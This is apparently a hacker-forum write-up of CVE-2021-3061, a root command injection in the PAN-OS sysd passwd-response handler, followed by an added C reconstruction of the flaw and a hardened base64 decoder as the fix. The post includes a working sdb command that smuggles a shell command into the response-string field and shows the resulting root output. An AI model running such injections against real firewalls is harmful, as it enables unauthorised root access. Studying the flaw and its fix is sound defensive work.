
sloppy data base (cve-2021-3061)

Posted by rqu69


Forum: Da Slop Pit Group

hewwo :3

yesterday i showed you how to get remote code execution as some preppy loser. today i will show you one easy trick to escalate privileges until ur cooler than boxxy.

pan-os internally uses a neat database/ipc service called sysd. sysd lets processes query and store objects (such as the serial number or configuration data), register as the handler for accesses to an object, and get notified when an object is updated. sysd can be queried from the pan-os shell with the sdb tool:

$ sdb cfg.platform.mac
cfg.platform.mac: BA:DB:AD:BA:BE:69

some configuration parameters can be updated using sdb. for example, the system banner can be updated with something like

sdb -P3 'sys.banner.user={"order": 10, "value":<b3dv>}'

the handler for a given object lives in whichever running process registered for it, and all sysd communication goes over a localhost network socket, so any process on the box that can reach that socket can send requests to any handler. as you can imagine, the sysd developers trust the inputs to this internal daemon a bit too much.

cve-2021-3061 is a command injection vulnerability in one of these handlers. the sys.root.passwd-response handler processes responses to TAC (support/debugging) authentication challenges. the flow is: first request a challenge, then send a response consisting of a response-string, login-type, user, and login-ip. the handler base64-decodes the response-string by sprintf'ing it into a shell command line and running base64 -d, so any shell metacharacters in response-string are interpreted by the shell, and that shell runs as root. as a result, you can root yourself a shiny new boxxy. i mean box.

$ sdb -P3 sys.root.passwd-challenge=new # request a challenge
sys.root.passwd-challenge: Please use the following string as your challenge:

B44bYsmOh0hoJOSfFRcUvgSNpf+DtJhqHk7AfzErC720ZclSaEsFk7zjWNFbSYPp

$ sdb -P3 -e "sys.root.passwd-response={'response-string':'a\\'|id>/tmp/whoami;\\'','login-type':'evil','user':'gir','login-ip':'1.3.3.7',}" # reply with a perfectly normal response, thank you very much
modify failed: PERMISSION
$ cat /tmp/whoami # owo whats this
uid=0(root) gid=0(root) groups=0(root)


anyways thats all for today folks xD


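Added example, not code from the post and not pan-os source: a C reconstruction of the bug class described above, with the fix beside it. build_decode_cmd_vuln() mimics a handler that sprintf's an untrusted response-string into a shell command line around base64 -d (the exact template pan-os uses is not shown on the page; `echo '%s' | base64 -d` is an assumption). base64_decode() is the hardened replacement: it decodes in-process with a strict alphabet check, so the input never reaches a shell and there is nothing left to inject into. Note in the transcript that sdb prints modify failed: PERMISSION, yet /tmp/whoami exists afterwards: the injected command has already run by the time that error is returned, so the error is not a sign the payload was rejected.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Vulnerable pattern (reconstruction, not pan-os source): the handler
 * splices the attacker-controlled response-string straight into a shell
 * command line. A single quote in the input closes the quoted argument,
 * so "a'|id>/tmp/whoami;'" yields: echo 'a'|id>/tmp/whoami;'' | base64 -d
 * Returns 0 on success, -1 if the command buffer is too small.
 */
int build_decode_cmd_vuln(const char *response, char *cmd, size_t cmdlen)
{
    int n = snprintf(cmd, cmdlen, "echo '%s' | base64 -d", response);
    return (n >= 0 && (size_t)n < cmdlen) ? 0 : -1;
}

/* Value of one base64 alphabet character, or -1 if it is not in the alphabet. */
static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/*
 * Hardened replacement: decode base64 in-process. Anything outside the
 * alphabet (including ' | ; > and whitespace), bad length or misplaced
 * padding is rejected with -1. On success the decoded bytes are written
 * to out, *written is set, and 0 is returned.
 */
int base64_decode(const char *in, unsigned char *out, size_t outlen, size_t *written)
{
    size_t len = strlen(in);
    size_t o = 0;

    if (len == 0 || len % 4 != 0)
        return -1;

    for (size_t i = 0; i < len; i += 4) {
        int v[4];
        int pad = 0;

        for (int k = 0; k < 4; k++) {
            char c = in[i + k];
            if (c == '=') {
                /* '=' is only legal as the last one or two chars of the input */
                if (i + 4 != len || k < 2)
                    return -1;
                v[k] = 0;
                pad++;
            } else {
                if (pad)                    /* data after padding */
                    return -1;
                v[k] = b64val((unsigned char)c);
                if (v[k] < 0)
                    return -1;
            }
        }

        uint32_t triple = ((uint32_t)v[0] << 18) | ((uint32_t)v[1] << 12) |
                          ((uint32_t)v[2] << 6) | (uint32_t)v[3];
        size_t nbytes = 3 - (size_t)pad;
        if (o + nbytes > outlen)
            return -1;
        out[o++] = (unsigned char)(triple >> 16);
        if (nbytes > 1) out[o++] = (unsigned char)(triple >> 8);
        if (nbytes > 2) out[o++] = (unsigned char)triple;
    }

    *written = o;
    return 0;
}

int main(void)
{
    /* constructed inputs: the payload from the transcript and a benign string */
    const char *payload = "a'|id>/tmp/whoami;'";
    const char *benign = "aGVsbG8=";
    char cmd[256];
    unsigned char buf[64];
    size_t n;

    build_decode_cmd_vuln(payload, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);

    printf("hardened decoder on payload: %s\n",
           base64_decode(payload, buf, sizeof buf, &n) == 0 ? "accepted" : "rejected");

    if (base64_decode(benign, buf, sizeof buf, &n) == 0)
        printf("hardened decoder on %s: %.*s\n", benign, (int)n, (const char *)buf);
    return 0;
}
```

The point of the fix is not escaping: quoting rules differ between shells and are easy to get wrong, so the robust move is to never hand untrusted bytes to a shell at all. If a handler genuinely must call an external program, fork/execve it with an argv array and feed the data over a pipe, never through a sprintf'd command line.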